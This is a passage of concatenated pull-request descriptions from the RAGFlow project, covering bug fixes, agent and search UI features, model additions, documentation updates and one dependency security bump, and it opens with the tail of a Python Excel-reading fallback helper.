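def read_excel_with_fallback(data: bytes, reader=None, fallback_engine: str = "calamine"):
    """Try the default engine first, then retry with the fallback engine."""
    if reader is None:
        # Imported lazily so the sketch can be exercised without pandas.
        import pandas as pd
        reader = pd.read_excel
    try:
        return reader(io.BytesIO(data))
    except Exception:
        # The default openpyxl / xlrd engine failed (for example on a
        # corrupted workbook); retry on a fresh buffer with the fallback.
        return reader(io.BytesIO(data), engine=fallback_engine)
```

A fresh `BytesIO` is created for the retry because the first attempt may have advanced or closed the original buffer.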
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/9385
Based on my understanding, I think checking empty string is fine
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
feat(next-search): Added AI summary functionality #3221
- Added the LlmSettingFieldItems component for AI summary settings
- Updated the SearchSetting component to integrate AI summary
functionality
- Added the updateSearch hook and related service methods
- Modified the ISearchAppDetailProps interface to add the llm_setting
field
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
_Briefly describe what this PR aims to solve. Include background context
that will help reviewers understand the purpose of the PR._
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
All models pass the mock response tests, which means that if a model can
return the correct response, everything should work as expected.
However, not all models have been fully tested in a real environment
with a real API_KEY. I suggest actively monitoring the refactored models
over the coming period to ensure they work correctly and fixing them
step by step, or waiting to merge until most have been tested in a
practical environment.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
- Fix error message assertion in test_update_chunk.py to match new
ownership validation
- Simplify dataset listing test cases by removing lambda assertions for
sorting
- Fix actions:
https://github.com/infiniflow/ragflow/actions/runs/16885465524/job/47831942553
### Type of change
- [x] Fix test cases
### What problem does this PR solve?
Python class Document was missing "meta_fields", e.g. when querying, the
document instances came without meta_fields
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Allow chat to use meta data #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Using the MCP server in n8n sometimes (with smaller models) results in
errors because the LLM drops or adds a character in the list of
dataset_ids it provides. It first asks for the list of datasets, and if
the list is long it makes an error when recalling it in full. Adding the
option to search through all available datasets solves this and makes
data retrieval more stable. Calling specific datasets by ID is
unchanged; dataset_ids is simply no longer required (only "question"
is). You can provide a list of datasets (as before), an empty list, or
no list at all.
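The fallback described above can be sketched roughly as follows. This is only an illustration: `resolve_dataset_ids` and its arguments are hypothetical names, not the MCP server's actual code.

```python
from typing import List, Optional


def resolve_dataset_ids(requested: Optional[List[str]], available: List[str]) -> List[str]:
    """Pick the datasets to search (hypothetical helper, for illustration only)."""
    # A missing list (None) and an empty list both mean "search everything".
    if not requested:
        return list(available)
    # An explicit list is used as given, like before.
    return list(requested)
```

With this shape, a caller that only sends "question" gets every available dataset, while a caller that passes IDs keeps the previous behavior.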
### Type of change
- [X] New Feature (non-breaking change which adds functionality)
<img width="1897" height="880" alt="mcp error dataset id"
src="https://github.com/user-attachments/assets/71076d24-f875-4663-a69a-60839fc7a545"
/>
Fixes an issue where running the sandbox (code component) fails due to
unresolved hostnames. Added missing service names (es01, infinity,
mysql, minio, redis) to 127.0.0.1 in the /etc/hosts example.
Reference: https://github.com/infiniflow/ragflow/issues/8226
## What this PR does
Updates the sandbox quickstart documentation to fix a known issue where
the sandbox fails to resolve required service hostnames.
## Why
Following the original instruction leads to a `Failed to resolve 'none'`
error, as discussed in issue #8226. Adding the missing service names to
`127.0.0.1` resolves the problem.
## Related issue
https://github.com/infiniflow/ragflow/issues/8226
## Note
It might be better to add `127.0.0.1 es01 infinity mysql minio redis` to
docs/quickstart.mdx, but since no issues appeared at the time without
this line, and the problem occurred while working with the code
component, I added it here.
### Type of change
- [X] Documentation Update
- Root cause: accessing req.get("dataset_ids") returns None when the key
is absent, causing KeyError.
- Fix: use req.get("dataset_ids", []) to default to empty list.
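A minimal sketch of the defaulting pattern, assuming `req` is a plain dict parsed from the request body (the helper name `read_dataset_ids` is made up for this example). Note that `dict.get` without a default returns `None` rather than raising, so it is the later use of that `None` that fails.

```python
def read_dataset_ids(req: dict) -> list:
    """Return the requested dataset IDs, or an empty list when none were sent."""
    # With the [] default, callers can iterate the result without a None check.
    return req.get("dataset_ids", [])


ids = read_dataset_ids({"question": "what is RAG?"})
for dataset_id in ids:  # safe: iterating an empty list does nothing
    print(dataset_id)
```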
### What problem does this PR solve?
- Modify error message assertion in chunk update test to check for
document ownership
- Add GraphRAG configuration with `use_graphrag: False` in dataset
update tests
- Fix actions:
https://github.com/infiniflow/ragflow/actions/runs/16863637898/job/47767511582
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- The default dataset_ids "kb1" was removed from the Chat class.
- The HTTP API response does not include the dataset_ids field.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add full list of supported AWS Bedrock regions.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
fix "no `tc` element at grid_offset", just log warning and ignore.
stacktrace:
```
Traceback (most recent call last):
File "/ragflow/rag/svr/task_executor.py", line 620, in handle_task
await do_handle_task(task)
File "/ragflow/rag/svr/task_executor.py", line 553, in do_handle_task
chunks = await build_chunks(task, progress_callback)
File "/ragflow/rag/svr/task_executor.py", line 257, in build_chunks
cks = await trio.to_thread.run_sync(lambda: chunker.chunk(task["name"], binary=binary, from_page=task["from_page"],
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 447, in to_thread_run_sync
return msg_from_thread.unwrap()
File "/ragflow/.venv/lib/python3.10/site-packages/outcome/_impl.py", line 213, in unwrap
raise captured_error
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 373, in do_release_then_return_result
return result.unwrap()
File "/ragflow/.venv/lib/python3.10/site-packages/outcome/_impl.py", line 213, in unwrap
raise captured_error
File "/ragflow/.venv/lib/python3.10/site-packages/trio/_threads.py", line 392, in worker_fn
ret = context.run(sync_fn, *args)
File "/ragflow/rag/svr/task_executor.py", line 257, in <lambda>
cks = await trio.to_thread.run_sync(lambda: chunker.chunk(task["name"], binary=binary, from_page=task["from_page"],
File "/ragflow/rag/app/naive.py", line 384, in chunk
sections, tables = Docx()(filename, binary)
File "/ragflow/rag/app/naive.py", line 230, in __call__
while i < len(r.cells):
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 438, in cells
return tuple(_iter_row_cells())
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 436, in _iter_row_cells
yield from iter_tc_cells(tc)
File "/ragflow/.venv/lib/python3.10/site-packages/docx/table.py", line 424, in iter_tc_cells
yield from iter_tc_cells(tc._tc_above) # pyright: ignore[reportPrivateUsage]
File "/ragflow/.venv/lib/python3.10/site-packages/docx/oxml/table.py", line 741, in _tc_above
return self._tr_above.tc_at_grid_offset(self.grid_offset)
File "/ragflow/.venv/lib/python3.10/site-packages/docx/oxml/table.py", line 98, in tc_at_grid_offset
raise ValueError(f"no `tc` element at grid_offset={grid_offset}")
ValueError: no `tc` element at grid_offset=10
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix "broken data stream when writing image file", just log warning and
ignore
Close #8379
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fixes the issue in the analyze_task execution flow where the Lead Agent
was not utilizing its own sys_prompt during task analysis, resulting in
incorrect or incomplete task planning.
https://github.com/infiniflow/ragflow/issues/9294
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- The enum import was changed from Python's built-in StrEnum to the
strenum package.
- Fix error `Warning: Failed to import module code_exec: cannot import
name 'StrEnum' from 'enum' (/usr/lib/python3.10/enum.py)`
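For context, `enum.StrEnum` only exists in the standard library from Python 3.11, which is why the import fails on 3.10. This PR switches to the strenum package; the sketch below shows a different, dependency-free fallback purely to illustrate the compatibility problem. The `Method` enum is a made-up example.

```python
import enum

try:
    from enum import StrEnum  # available on Python 3.11+
except ImportError:
    class StrEnum(str, enum.Enum):
        """Small stand-in for older interpreters (not the strenum package)."""

        def __str__(self) -> str:
            return str(self.value)


class Method(StrEnum):  # hypothetical enum, for illustration
    GET = "get"
    POST = "post"
```

Members compare equal to their string values on both code paths, so callers do not need to know which branch was taken.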
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Run eslint when the project is running to standardize everyone's
code #9377
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
add ru
### What problem does this PR solve?
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
Co-authored-by: Yingfeng <yingfeng.zhang@gmail.com>
### What problem does this PR solve?
Feat: Modify the agent list return field name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: New search page components and features #3221
- Added search homepage, search settings, and ongoing search components
- Implemented features such as search app list, creating search apps,
and deleting search apps
- Optimized the multi-select component, adding disabled state and suffix
display
- Adjusted navigation hooks to support search page navigation
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.20.0 to v0.20.1
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Revert token_required decorator of agent_bot completions and inputs.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] Refactoring
### What problem does this PR solve?
feat(agent): Adds prologue functionality #3221
- Add a prologue field to the IInputs type
- Initialize the prologue state in the chat container
- Use useEffect to monitor prologue changes and add prologue responses
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
new Agent templates: you can choose your knowledge base, providing
workflow and Agent versions
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Set the description of the agent, which can be null #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render agent setting dialog #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Update broken agent completion due to v0.20.0 changes. #9199
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Contribute a new workflow template: SQL Assistant
### Type of change
- [x] Other (please describe): new workflow template
### What problem does this PR solve?
Feat: Restore the button's background color #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Replace color variables according to design draft #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Configure colors according to the design draft #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix virtual file cannot be displayed in KB. #9265
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix: Optimized popups and the search page #3221
- Added a new PortalModal component
- Refactored the Modal component, adding show and hide methods to
support popups
- Updated the search page, adding a new query function and optimizing
the search card style
- Localized, added search-related translations
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Add missing env var `MYSQL_MAX_PACKET` to service_conf.yaml.template,
and add default values to opendal config to fix npe.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Updated constructors for base and derived classes in chat, embedding,
rerank, sequence2txt, and tts models to accept **kwargs. This change
improves extensibility and allows passing additional parameters without
breaking existing interfaces.
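A rough sketch of the constructor pattern, with hypothetical class and parameter names (`Base`, `DemoChat`, `base_url`, `extra`) that are not taken from the actual model classes:

```python
class Base:
    def __init__(self, key, model_name, **kwargs):
        self.key = key
        self.model_name = model_name
        # Unknown options are kept instead of raising TypeError.
        self.extra = kwargs


class DemoChat(Base):
    def __init__(self, key, model_name, base_url="https://example.invalid/v1", **kwargs):
        # Forward whatever this class does not consume to the base class.
        super().__init__(key, model_name, **kwargs)
        self.base_url = base_url


model = DemoChat("api-key", "demo-model", timeout=30)
```

Existing call sites that pass only the original arguments keep working, which is what makes the change non-breaking.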
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: IT: Sop.Son <sop.son@feavn.local>
Co-authored-by: Copilot <175728472+Copilot@users.noreply.github.com>
### What problem does this PR solve?
Feat: Search conversation by name #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Create a conversation #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Improve the logic so that it does not decode base 64 for the test image
each time
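One way to avoid repeated decoding is to cache the decoded bytes, sketched below with `functools.lru_cache`. This is an assumption about the general idea, not the PR's actual change; `_TEST_IMAGE_B64` and `get_test_image_bytes` are placeholder names, and the payload is dummy data rather than a real image.

```python
import base64
from functools import lru_cache

# Placeholder payload standing in for the real base64 test image.
_TEST_IMAGE_B64 = base64.b64encode(b"not-a-real-image").decode("ascii")


@lru_cache(maxsize=1)
def get_test_image_bytes() -> bytes:
    """Decode the test image once; later calls reuse the cached bytes."""
    return base64.b64decode(_TEST_IMAGE_B64)
```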
### Type of change
- [x] Refactoring
- [x] Performance Improvement
---------
Co-authored-by: Kevin Hu <kevinhu.sh@gmail.com>
### What problem does this PR solve?
Add Claude Opus 4.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Refactoring
FIX: If chunk["content_with_weight"] contains one or more unpaired
surrogate characters (such as incomplete emoji or other special
characters), then calling .encode("utf-8") directly will raise a
UnicodeEncodeError.
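A small sketch of one possible way to handle this, using the standard `errors="replace"` handler so that a lone surrogate becomes `?` instead of raising. Whether the actual fix replaces, drops, or otherwise handles these characters is not stated here, so treat the choice of handler as an assumption; `encode_utf8_lossy` is a hypothetical name.

```python
def encode_utf8_lossy(text: str) -> bytes:
    """Encode to UTF-8, substituting '?' for characters that cannot be encoded."""
    return text.encode("utf-8", errors="replace")


broken = "ok\ud83d"  # ends with an unpaired high surrogate
data = encode_utf8_lossy(broken)
```

Well-formed text, including complete emoji, is encoded unchanged; only the unpaired surrogate is substituted.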
### What problem does this PR solve?
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
feat(agent): Added history management and paste handling features #3221
- Added a PasteHandlerPlugin to handle paste operations, optimizing the
multi-line text pasting experience
- Implemented the AgentHistoryManager class to manage history,
supporting undo and redo functionality
- Integrated history management functionality into the Agent component
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Implemented French UI translation
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
---------
Co-authored-by: ramin cedric <>
Co-authored-by: Liu An <asiro@qq.com>
### What problem does this PR solve?
Update readme
### Type of change
- [x] Documentation Update
---------
Signed-off-by: Jin Hai <haijin.chn@gmail.com>
### What problem does this PR solve?
Feat: Limit the appearance of loops in operators in the agent canvas
#3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Tiny fix to the use of `deepdoc.pdf_parser.PlainParser` in
`rag.app.presentation.chunk`, following how the class is used elsewhere.
The fix is so small that a separate issue seems unnecessary.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Render dialog list #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#9232
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
1. When creating a new session, initialize an empty reference that
includes both the app api and sdk API.
2. Fix the logic when retrieving references for historical messages: the
number of dialogue messages and reference messages may differ, but it
should match the number of assistant messages.
Co-authored-by: Li Ye <liye@unittec.com>
### What problem does this PR solve?
Fix: Fixed the issue where numbers could not be displayed in the numeric
input box under white theme #3221
Fix: Set the maximum number of rounds for the agent to 1 #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
This commit refactors the core prompts to decouple the high-level
reasoning from the low-level information extraction. By making
REASON_PROMPT a dedicated strategist that only generates search queries
and re-tasking RELEVANT_EXTRACTION_PROMPT to be a specialized tool for
single-fact extraction, we eliminate redundant information
summarization. This clear separation of concerns makes the overall
reasoning process significantly faster and more precise, as each
component now has a single, well-defined responsibility.
### Type of change
- [x] Performance Improvement
### What problem does this PR solve?
Fix: Add prompt text to the form in the MCP module #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the agent's chat box could not automatically
scroll to the bottom #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the loss of Await Response function on the share page and
other style issues #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix: Fixed the issue where the prompt word edit box had no scroll bar
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
list_document supports range filtering.
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
**Context and Purpose:**
This PR automatically remediates a security vulnerability:
- **Description:** h11: h11 accepts some malformed Chunked-Encoding
bodies
- **Rule ID:** CVE-2025-43859
- **Severity:** CRITICAL
- **File:** uv.lock
- **Lines Affected:** None - None
This change is necessary to protect the application from potential
security risks associated with this vulnerability.
**Solution Implemented:**
The automated remediation process has applied the necessary changes to
the affected code in `uv.lock` to resolve the identified issue.
Please review the changes to ensure they are correct and integrate as
expected.
### What problem does this PR solve?
Feat: New Agent startup parameters add knowledge base parameter #9194
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix "out of memory" when slide.get_thumbnail() produces a huge image.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
fix "TypeError: '<' not supported between instances of 'Emu' and
'NoneType'"
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix #8424: NPE in dify_retrieval.py; add exception logging.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix:
```bash
'Langfuse' object has no attribute 'trace'
```
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
https://github.com/infiniflow/ragflow/issues/9177
The likely cause is that Gemini internally uses a different parameter
name:
`
max_output_tokens (int):
Optional. The maximum number of tokens to include in a
response candidate.
Note: The default value varies by model, see the
``Model.output_token_limit`` attribute of the ``Model``
returned from the ``getModel`` function.
This field is a member of `oneof`_ ``_max_output_tokens``.
`
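The renaming could be sketched as below. It assumes the incoming generation config uses an OpenAI-style `max_tokens` key, which is a guess for illustration; only `max_output_tokens` comes from the docstring quoted above, and `to_gemini_generation_config` is a hypothetical helper.

```python
def to_gemini_generation_config(gen_conf: dict) -> dict:
    """Copy gen_conf, renaming max_tokens to the name Gemini expects."""
    conf = dict(gen_conf)  # do not mutate the caller's dict
    if "max_tokens" in conf:
        conf["max_output_tokens"] = conf.pop("max_tokens")
    return conf
```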
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
The index name of the tag chunks is generated by the tenant id of the
knowledge base, so it should use the tenant id instead of the current
user id in the listing tags API.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
This PR adds a data backup and migration solution for RAGFlow Docker
Compose deployments. Currently, users lack a standardized way to backup
and restore RAGFlow data volumes (MySQL, MinIO, Redis, Elasticsearch),
which is essential for data safety and environment migration.
**Solution:**
- **Migration Script** (`docker/migration.sh`) - Automates
backup/restore operations for all RAGFlow data volumes
- **Documentation**
(`docs/guides/migration/migrate_from_docker_compose.md`) - Usage guide
and best practices
- **Safety Features** - Container conflict detection and user
confirmations to prevent data loss
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
- [x] Documentation Update
Co-authored-by: treedy <treedy2022@icloud.com>
### What problem does this PR solve?
- Update version tags in README files (including translations) from
v0.19.1 to v0.20.0
- Modify Docker image references and documentation to reflect new
version
- Update version badges and image descriptions
- Maintain consistency across all language variants of README files
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Feat: Adjust the style of the note node #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed share-log UI issues and log-template bugs #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Modify the style of the agent page bright theme #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add industry-related search keyword generation function
- When generating search keywords, support for specific industries has
been added
- If the "industry" parameter is provided, industry-specific
restrictions will be added to the prompt
- This change can help users generate more precise search keywords
within specific industries
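As a rough illustration of the optional parameter, the sketch below appends an industry restriction only when one is given. The function name and the prompt wording are invented for this example and do not reproduce the real prompt.

```python
from typing import Optional


def build_keyword_prompt(question: str, industry: Optional[str] = None) -> str:
    """Build a keyword-generation prompt, optionally scoped to one industry."""
    prompt = f"Generate search keywords for the following question:\n{question}"
    if industry:
        # Only add the restriction when the caller supplies an industry.
        prompt += f"\nRestrict the keywords to the {industry} industry."
    return prompt
```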
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add a series of qwen3 latest SOTA models:
qwen3-coder-480b-a35b-instruct, qwen3-30b-a3b-instruct-2507,
qwen3-30b-a3b-thinking-2507, qwen3-235b-a22b-instruct-2507,
qwen3-235b-a22b-thinking-2507
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Remove the exception comment field from the agent form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix kimi-latest is not authorized.
Add kimi-thinking-preview.
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
```bash
Traceback (most recent call last):
File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 635, in update_progress
info["progress_msg"] = "%d tasks are ahead in the queue..."%get_queue_length(priority)
File "/home/infiniflow/workspace/ragflow/api/db/services/document_service.py", line 686, in get_queue_length
return int(group_info.get("lag", 0))
TypeError: int() argument must be a string, a bytes-like object or a real number, not 'NoneType'
```
This issue occurs very rarely. When a `stream` is first created, the
`lag` value may be nil, which triggers the error above. Once any
message is synced, `lag` becomes `0`.
```bash
> XINFO GROUPS rag_flow_svr_queue
1) 1) "name"
2) "rag_flow_svr_task_broker"
3) "consumers"
4) (integer) 0
5) "pending"
6) (integer) 0
7) "last-delivered-id"
8) "1753952489937-0"
9) "entries-read"
10) (nil)
11) "lag"
12) (nil)
```
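The reason `group_info.get("lag", 0)` still fails is that the key is present but maps to `None`, so the default is never used. A minimal sketch of a None-safe read, assuming `group_info` is a plain dict (`queue_lag` is a hypothetical helper name):

```python
def queue_lag(group_info: dict) -> int:
    """Return the consumer group's lag, treating a missing or nil value as 0."""
    # `or 0` covers both an absent key and a key whose value is None.
    return int(group_info.get("lag") or 0)
```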
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Delete the operator node and hide the corresponding sheet #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Display operator icons on the agent form #3221
Fix: Fixed the issue where the form corresponding to the tool operator
icon could not appear after clicking it #3211
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Improve Agent templates functionality and fix some UI style issues
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Displays the tool operator icon #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
add Kimi-K2-Instruct from Tongyi-Qianwen API
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Automatically save agent canvas content
Feat: Replace the link of the old version of the agent module #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Add Generator return type annotation for tts method
- Import typing.Generator for type hints
### Type of change
- [x] Refactoring
### What problem does this PR solve?
This code allows user chat to auto-scroll down when entered, but if user
scrolls up away from the generative feedback, autoscroll is disabled.
Close #9062
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
---------
Co-authored-by: Charles Copley <ccopley@ancera.com>
### What problem does this PR solve?
Feat: Make the agent dialog window exposed to the outside world fill in
the begin form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
#9082 #6365
<u> **WARNING: it's not compatible with the older version of `Agent`
module, which means that `Agent` from older versions can not work
anymore.**</u>
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Handling abnormal anchor points of agent operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add log-detail page, improve the style of chat boxes #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Translate operator names and allow mailboxes to reference operator
names #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Replace the placeholder test image in base64_image.py with a new sample
image data string.
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Feat: Add wencai operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
doc_ids is a list, so it should be read with request.args.getlist("doc_ids").
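To show why a single-value lookup loses data, here is a standard-library analogy using `urllib.parse.parse_qs` in place of the web framework's request object. It is a stand-in only: the query string is made up, and the point is simply that a repeated parameter carries several values.

```python
from urllib.parse import parse_qs

# A query string in which doc_ids is repeated, as a client would send a list.
query = "doc_ids=doc1&doc_ids=doc2&page=1"
params = parse_qs(query)

# Reading every value keeps the full list; taking only the first drops doc2.
doc_ids = params.get("doc_ids", [])
first_only = doc_ids[0] if doc_ids else None
```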
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Feat: Add invoke and github operators #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix error 429 (API rate limit) when building a knowledge graph, for all
chat models and the Mistral embedding model.
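How the rate limit is handled is not described here. A common generic technique for 429 responses is retrying with exponential backoff and jitter, sketched below under that assumption; `RateLimitError` and `call_with_backoff` are hypothetical names, not the project's code.

```python
import random
import time


class RateLimitError(Exception):
    """Stand-in for a provider's HTTP 429 error (hypothetical)."""


def call_with_backoff(fn, max_retries=5, base_delay=1.0, sleep=time.sleep):
    """Call fn(), retrying on RateLimitError with exponentially growing delays."""
    for attempt in range(max_retries + 1):
        try:
            return fn()
        except RateLimitError:
            if attempt == max_retries:
                raise  # out of retries: surface the error to the caller
            # Double the wait on each attempt and add jitter to spread retries.
            delay = base_delay * (2 ** attempt) + random.uniform(0, base_delay)
            sleep(delay)
```

The `sleep` parameter exists so the delay can be swapped out in tests.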
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
- Fix incomplete curl command in section 5 'Tool calling', add missing
closing braces and parentheses to complete the JSON payload
This resolves the incomplete bash script that was missing proper JSON
structure closure.
### Type of change
- [x] Documentation Update
### What problem does this PR solve?
Fix: Add agent-log-list page; RAPTOR: saving directly after enabling
submitted an incomplete form #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Supports jsonl or ldjson format. Feature request from
[discussion](https://github.com/orgs/infiniflow/discussions/8774).
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Enable MCP streamable-http model via docker compose
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Arxiv GoogleScholar operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Email and DuckDuckGo and Wikipedia Operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Add documentation for MCP streamable-http transport.
### Type of change
- [x] Documentation Update
---------
Co-authored-by: writinwaters <93570324+writinwaters@users.noreply.github.com>
### What problem does this PR solve?
Feat: Add Yahoo Finance Operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add Google operator #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Render the uploaded agent message file #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: The operator is displayed only when the number of conditions is
greater than 1 #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Click the edit tool button of the agent form to open the
corresponding form #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Add agent log-sheet in canvas and log-sheet in share's page #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Fix: Fixed the issue that the condition of deleting the classification
operator cannot be connected anymore #3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Mac OS build fails on M4. Docker compose requires platform to be
specified to build correctly
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
Co-authored-by: Charles Copley <ccopley@ancera.com>
### What problem does this PR solve?
Feat: Filter the agent form's large model list by type #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
Feat: Keep the workflow page link unchanged #3221
### Type of change
- [x] New Feature (non-breaking change which adds functionality)
### What problem does this PR solve?
- Update BaseModel to use model_config instead of Config class
- Replace StrEnum with Literal types for method fields
- Convert Field declarations to Annotated style
### Type of change
- [x] Refactoring
### What problem does this PR solve?
Add parsing animations to the agent log and optimize some page styles
#3221
### Type of change
- [x] Bug Fix (non-breaking change which fixes an issue)
### What problem does this PR solve?
Fix a small, non-blocking bug in the main workflow concerning chunk
updates when OpenSearch is the doc engine.
